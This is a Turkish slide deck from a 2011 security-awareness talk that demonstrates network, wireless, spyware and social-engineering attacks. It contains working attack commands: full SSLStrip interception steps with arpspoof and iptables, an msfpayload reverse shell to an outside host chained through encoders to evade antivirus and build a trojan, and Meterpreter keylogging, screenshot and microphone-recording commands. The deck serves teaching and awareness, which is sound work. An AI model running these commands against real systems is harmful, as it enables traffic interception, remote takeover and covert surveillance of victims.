32
Güvenlik Riskleri ve Saldırı Y öntemleri Ozan UÇAR [email protected] Bilgi Güvenliği Akademisi (BGA) Melike Pınar Koleji BURSA 2011

Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

  • Upload
    others

  • View
    9

  • Download
    0

Embed Size (px)

Citation preview

Page 1: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Güvenlik Riskleri ve Saldırı Yöntemleri

Ozan UÇ[email protected]

Bilgi Güvenliği Akademisi (BGA)

Melike Pınar Koleji BURSA 2011

Page 2: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Hacking Kültürü Hakkında

Bilgisayar yeraltı dünyası bir aynalı salondur. Gerçek bükülür, doğrular küçülür.

- Sıfıra Doğru

www.bga.com.tr 2

Page 3: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Bilinen Bazı Yanlışlar

Yanlış bildiğimiz veya yanlış tanıştırıldığımız

“Hack” ve “Hacker” kavramlarına bir bakalım

www.bga.com.tr 3

Page 4: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

C|EH TÜRKİYE

Bilgi güvenliği kapsamında bilişim gönüllülerine destek vermek için bilgi birikimini ve tecrübelerini paylaşan Ethical Hackerların oluşturduğu bir bilgi güvenliği kütüphanesidir.

www.bga.com.tr 4

Page 5: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Bilgi Güvenliği Akademisi

• 2008 yılında Türkiye’deki bilgi güvenliği sektörüne profesyonel anlamda destek olmak amacıyla kurulan Bilgi Güvenliği AKADEMİSİ ileri seviye güvenlik danışmanlığı ve güvenlik eğitimleri konularında kurumlara hizmet vermektedir.

• Aktif çalışma hayatına başladığı 2008 yılından bu yana özel, kamu ve askeri alanda 300′ün üzerinde eğitim ve danışmanlık referansı olmuştur.

• Sektörün gelişimine katkıda bulunmak amacıyla her yıl 10’nun üzerinde bilgi güvenliği etkinliğine destek veren Bilgi Güvenliği AKADEMİSİ’nin temel hedefi Türkiye ve dünyada ürün bağımsız güvenlik anlayışının yerleşmesidir.

www.bga.com.tr 5

Page 6: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Hack

• Bir bilgisayarla bir hedefe yönelik olarak değil de oyuncu ve araştırmacı biçimde etkileşim kurmak.

• “dehanın/hünerin doğru uygulanışı” olarak tanımlanabilir.

• Sonuç çabuk bir yama olsun, ya da dikkatlice yaratılmış bir sanat eseri olsun, içindeki zekaya hayran kalmalısınız.

www.bga.com.tr 6

Page 7: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Hacker

• Dilimizde bir karşılığı yok fakat Üstad kelimesi

hacker yerine kullanılabilir.

• Programlanabilen sistemlerin, yalnızca gereken

minimumu öğrenmeyi tercih eden çoğunluğun aksine,

detaylarını ve yeteneklerinin nasıl genişletilebileceğini

araştırmaktan hoşlanan kimse

• Herhangi bir konuda uzman ya da meraklı kimse.

Örneğin “astronomi hacker'ı”

www.bga.com.tr 7

Page 8: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Cracker

• Gazetecilerin “hacker” terimini yanlış kullanarak

tarif ettikleri bilgisayar korsanlarını tanımlamak için

hacker'lar tarafından 1985'te oluşturulan bir terim.

www.bga.com.tr 8

•Bu kişiler bilgiyasar sistemlerini kırarak zarar vermekten zevk alırlar.•Çoğunluğu genç erkeklerden oluşan bu gurup kendilerine toplum içerisinde yüksek sesle “hacker” demeyi severler.

Page 9: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Lamer

• Hacking, Cracking gibi konularda bilgisi olmadan veya

kulaktan dolma bilgilerle hacker gibi davranmaya

çalışan kişilerdir...

• Üstatlar tarafından sevilmezler ve biraz da alaycı

şekilde Lamer olarak adlandırılırlar.

• Eğer bir sisteme girmeyi başarırlarsa

çok fazla iz bırakırlar, izlerini silemezler

veya girdikleri sistemden kendilerine

virüs bulaştırabilirler.

www.bga.com.tr 9

Page 10: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Sunum İçeriği

Ağ Tabanlı Saldırılar (Uygulamalı)

• ARP/RARP Protokolleri ve Zayıflıkları

• Yerel Ağın Zehirlenmesi

• Ortadaki Adam (mitm) Saldırısı

• Facebook, MSN Yazışmalarını Görüntüleme, Mailleri ele geçirme

• SSL Trafiğinde araya girme (SSLStrip)

Kablosuz Ağlarda Güvenlik

• WEP/WPA şifrelemelerinin kırılması

• Sahte Kablosuz Erişim Noktaları ( Uygulamalı )

www.bga.com.tr 10

Page 11: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Sunum İçeriği | Devam

Casus yazılımların yarattığı tehlikeler (Uygulamalı)

• Antivirus yazılımları nasıl atlatılır ?

• Gelişmiş bir casus yazılım olarak “Meterpreter”

• Webcam görüntülerini ele geçirme

• Ortam dinleme

• Ekran görüntüsü alma

• Klavye girişlerini yakalamak

Sosyal Mühendis Saldırıları

• İnsan tabanlı zafiyetler ve Aldatma sanatı

• Örnek ses kaydı

• Sosyal Mühendislik Aracı (SET)

www.bga.com.tr 11

Page 12: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Ağ Tabanlı Saldırılar

ARP/RARP Protokolü;

• Bu protokol iki bilgisayarın haberleşmesi için gerekli fiziksel adreslerin tespit edilmesini sağlar.

• Ağa bağlanan bir A bilgisayarı, B bilgisayarına ulaşmak istediği zaman B bilgisayarının IP adresine karşılık gelen MAC adresini bulmak için tüm ağa broadcast ile yayın yapar.

• Broadcast isteği ağda bulunan tüm bilgisayarlara iletili, fakat yanıt yalnızca B bilgisayarından döner.

www.bga.com.tr 12

Page 13: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Ağ Tabanlı Saldırılar

Yerel Ağın Zehirlenmesi;

• Saldırgan, A bilgisayarına sahte arp paketleri göndererek arp önbelleğini zehirleyecek ve tüm veriler saldırganın MAC adresine gönderilecektir.

www.bga.com.tr 13

Page 14: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Ağ Tabanlı Saldırılar

MITM Saldırısı;

• Ortadaki adam saldırısında, saldırgan kaynak ve hedef iki sistemi kandırarak trafiğin üzerinden geçmesini amaçlar.

www.bga.com.tr 14

Page 15: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Ağ Tabanlı Saldırılar | Uygulama

Yerel Ağın Zehirlenmesi.BackTrack Linux üzerinde Ettercap ile uygulama;

FTP, SMTP, HTTP parolaları …

www.bga.com.tr 15

Page 16: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Ağ Tabanlı Saldırılar | Uygulama

Windows üzerinde Cain&Abel yazılımı ile uygulama

www.bga.com.tr 16

Page 17: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Facebook Chat Forensics

Facebook Chat kayıtları;

fbs.py cehturkiye ekibi tarafından network forensic aracı olarak yazılmıştır.

www.bga.com.tr 17

Page 18: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

SSL trafiğinde araya girme (SSLStrip)

SSLStrip çalışma şekli

1. Saldırgan, kurban sistemin trafiğini üzerinden geçirir.

2. Saldırgan, hedef sunucudan gelen https bağlantılarını kendi üzerinde sonlandırıp istemciye http olarak iletir.

3. İstemciden dönen trafik okunabilir olduğundan, saldırgan tüm verileri görüntüleyebilir/kaydedebilir.

www.bga.com.tr 18

Page 19: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

SSL trafiğinde araya girme (SSLStrip)

Saldırı denemesi;

1. Sistemini yönlendirme moduna geçirecho "1" > /proc/sys/net/ipv4/ip_forward

2. Hedef portu 80 olan trafiği, dinlediğin porta (88) yönlendir.iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 88

3. Hedef sistem ile yönlendirici arasına girarpspoof -i <ağ arabirimi> -t <HedefSisteminIpAdresi> <hedefRouterIpAdresi>

4. SSLStrip ile trafiği kaydetpython sslstrip.py -f -p -w veriler -l 88

www.bga.com.tr 19

Saldırı ile elde edilen

bilgiler

Page 20: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Kablosuz Ağlarda Güvenlik

WEP korumalı ağları kırmak;• Algoritması zayıftır

• Parolayı kırmak için yeterli sayıda paket yakalamak gerekiyor

• Parolanın karışık ve uzun olması önemli değildir.

Video: http://www.cehturkiye.com/index.php/2009/01/11/wireless-networkleri-hacklemek/wireless-networkleri-hacklemek.html

www.bga.com.tr 20

Page 21: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Kablosuz Ağlarda Güvenlik

WPA korumalı ağları kırmak;

• Güçlü bir algoritması bulunuyor (henüz kırılamadı)

• Parolayı kırmak için yeterli sayıda paket yakalamak gerekiyor

• Parolanın karışık ve uzun olması kırma işlemini uzatır.

Belge: http://www.cehturkiye.com/index.php/2010/06/07/wireless-pentest-wpa-crack/wireless-pentest-wpa-crack.html

www.bga.com.tr 21

Page 22: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Sahte Kablosuz Erişim Noktaları(Uygulamalı)

• Yalnızca amacı kötü olduğu için “sahte” olarak isimlendirilir, gerçeğinden ayırt edilemez

• Kablosuz internet kullanıcılarını hedefler

• Kablosuz ağ istemcileri, saldırgan tarafından yayın yapan kablosuz ağa dahil oldukdan sonra, tüm internet trafiği kaydedilir.

• DNS önbelleğini zehirleyerek sahte erişim sayfaları ile kimlik avı yapabilir.

www.bga.com.tr 22

Page 23: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Sahte Kablosuz Erişim Noktaları(Uygulamalı)

www.bga.com.tr 23

Saldırı yapılan sistemden ekran görüntüsü

Page 24: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Sahte Kablosuz Erişim Noktaları(Uygulamalı)

www.bga.com.tr 24

İnternete ilk girildiği anda, sahte bir güncelleme mesajı ile casus yazılım kurban bilgisayara yüklenir.

Page 25: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Antivirus yazılımları nasıl atlatılır ?

www.bga.com.tr 25

• İmza tabanlı ve shell test yapan antivirusler

• Sezgisel Antiviruslerin çalışma mantığı ?

• Saldırı tespit ve Engelleme Sistemleri

./msfpayloadwindows/shell_reverse_tcpLHOST=ozan.dyndns.org LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe> /tmp/trojan.exe

Page 26: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Gelişmiş bir casus yazılım olarak “Meterpreter”

www.bga.com.tr 26

Keylogger olarak kullanımı;

> keyscan_start

> keyscan_dump

Hedefin ekran görüntüsünü ele geçirme

> screeshot

Page 27: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Gelişmiş bir casus yazılım olarak “Meterpreter”

www.bga.com.tr 27

Ortam Dinleme

Kurban sistemde bir mikrofon varsa, ortam dinlemesi yapılabilir.> record_mic -d 25 // 25. sn boyunca dinleme yap ve kaydet.

[*] Starting...

[*] Stopped

Audio saved to: /opt/metasploit3/msf3/nFqYscte.wav

Webcam Görüntüsünü Ele Geçirme

Page 28: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Sosyal Mühendis Saldırıları

www.bga.com.tr 28

• İnsan tabanlı zaafiyetler ve Aldatma sanatı

• Örnek ses kaydı

• Sosyal Mühendislik Aracı (SET)

Page 29: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Sosyal Mühendis Saldırıları

www.bga.com.tr 29

Page 30: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Gerçek Dünyadan Hacking Örnekleri

www.bga.com.tr 30

Hepsibursada.com Saldırı Girişimi;

•Cookies manipulation•JavaScript kontrollerini atlatmak•Farklı kullanıcının profil bilgilerini ele geçirmek

Page 31: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Gerçek Dünyadan Hacking Örnekleri

www.bga.com.tr 31

xxxx.com ağına saldırı denemesi;

• Çalışan Aktif Servislerin Tespiti• SSH Servisi Parola Kırma Saldırısı• Exploit ile sisteme giriş.• Giriş sonrası network keşfi• Arkakapı oluşturma

Page 32: Güvenlik Riskleri ve Saldırı Yöntemleri · Sunum İçeriği Ağ Tabanlı Saldırılar (Uygulamalı) • ARP/RARP Protokolleri ve Zayıflıkları • Yerel Ağın Zehirlenmesi

Sorular ?